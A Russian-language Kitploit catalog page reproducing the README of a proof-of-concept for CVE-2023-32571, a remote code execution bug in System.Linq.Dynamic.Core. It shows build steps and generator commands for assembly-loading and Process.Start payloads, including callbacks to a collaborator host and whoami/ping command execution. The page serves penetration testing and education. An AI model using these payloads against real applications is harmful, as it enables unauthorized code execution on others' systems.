Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-32571 — Доказательство концепции для CVE-2023-32571 | Kitploit
Инструменты/GitHubGitHub/sectex/cve-2023-32571
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийОбучение и Образование
GitHubsectex/cve-2023-32571

CVE-2023-32571

Доказательство концепции для CVE-2023-32571

Репозиторий
210 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🐞 CVE-2023-32571 - Удаленное выполнение кода в System.Linq.Dynamic.Core

Доказательство концепции для CVE-2023-32571, уязвимости удаленного выполнения кода в System.Linq.Dynamic.Core (версии с 1.0.7.10 по 1.2.25). Эта уязвимость позволяет злоумышленникам выполнять произвольный код и команды при обработке недоверенного ввода в методах, включая Where, Select, OrderBy.

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных и разрешенных целей тестирования. Использование этого инструмента для атаки на цели без предварительного взаимного согласия незаконно. Разработчики не несут ответственности и не отвечают за любое неправомерное использование или ущерб, причиненный этой программой.

🎯 Предварительные требования

  • .NET 9.0 SDK или новее
  • Целевое приложение, использующее уязвимую версию System.Linq.Dynamic.Core (1.0.7.10 — 1.2.25)
  • Сервер-коллаборатор (например, Burp Collaborator, Interactsh) для наблюдения за обратными вызовами

🛠️ Сборка проекта

  1. Соберите проект:
    root@kitploit:~
    Сборка создаст
dotnet build --configuration Release
  • DLL полезной нагрузки по пути Payload/bin/Release/netstandard2.0/Payload.dll
  • Генератор полезной нагрузки по пути Generator/bin/Release/net9.0/Generator.dll

🚀 Использование

Режимы

Инструмент поддерживает два режима:

  1. AssemblyLoad (Режим 0): Загрузка и выполнение пользовательской .NET сборки
  2. ProcessStart (Режим 1): Непосредственное выполнение системных команд через Process.Start

Режим 0: AssemblyLoad (по умолчанию)

root@kitploit:~
# Using Base64 encoding
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 1

# Using Hex encoding
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 0
root@kitploit:~
# Using Base64 encoding
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 1

# Using Hex encoding
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 0

Режим 1: ProcessStart (Прямое выполнение команд)

root@kitploit:~
# Windows command execution
./Generator --mode 1 --parameters "cmd.exe /c ping <your-collaborator-url>"

# Linux command execution  
./Generator --mode 1 --parameters "bash -c ping <your-collaborator-url>"

⚙️ Параметры

  • --mode: Режим эксплуатации (0=AssemblyLoad, 1=ProcessStart)
  • --file: Путь к загружаемой .NET сборке (требуется для режима AssemblyLoad)
  • --type: Полное имя типа для создания экземпляра (требуется для режима AssemblyLoad)
  • --parameters: Параметры в зависимости от режима:
    • AssemblyLoad: Параметры конструктора (через запятую)
    • ProcessStart: Команда для выполнения (например, 'cmd.exe /c whoami' или 'bash -c whoami')
  • --encoding: Метод кодирования для режима AssemblyLoad (0=Hex, 1=Base64)

📚 Ссылки

  • NIST NVD
  • NCCGROUP Advisory
  • Репозиторий System.Linq.Dynamic.Core на GitHub
Скачать инструмент